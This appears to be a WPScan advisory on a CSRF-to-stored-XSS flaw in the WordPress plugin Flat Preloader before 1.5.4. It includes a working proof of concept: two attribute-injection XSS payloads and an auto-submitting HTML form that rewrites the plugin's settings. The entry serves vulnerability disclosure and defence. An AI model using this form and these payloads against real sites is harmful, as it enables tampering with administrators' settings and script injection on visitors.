WordPress Plugin Vulnerabilities
Flat Preloader < 1.5.4 - CSRF to Stored Cross-Site Scripting
Description
The plugin does not enforce nonce checks when saving its settings, as well as does not sanitise and escape them, which could allow attackers to a make logged in admin change them with a Cross-Site Scripting payload (triggered either in the frontend or backend depending on the payload)
The CSRF was fixed in 1.5.1, however further sanitisation was done in v1.5.2 to 1.5.4
Proof of Concept
Depending on the payload, the XSS will be triggered either in the frontend or backend: Frontend: " onload=alert(/XSS/)// Backend: " style=animation-name:rotation onanimationstart=alert(/XSS/)// <form action="https://example.com/wp-admin/options-general.php?page=flat-preloader" method="post" id="csrf"> <input type="hidden" name="preloader-style" value="windows-10/circles-menu-1.gif"> <input type="hidden" name="preloader-display" value="all"> <input type="hidden" name="preloader[custom_image_url]" value=""> <input type="hidden" name="preloader[text_under_icon]" value=""> <input type="hidden" name="preloader[delay_time]" value=""> <input type="hidden" name="preloader[alt]" value='PAYLOAD'> <input type="hidden" name="save-option" value="Save Changes"> </form> <script>csrf.submit()</script>
Affects Plugins
Fixed in 1.5.4 References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-09-28 (about 2 years ago)
Added
2021-09-28 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
WPScan 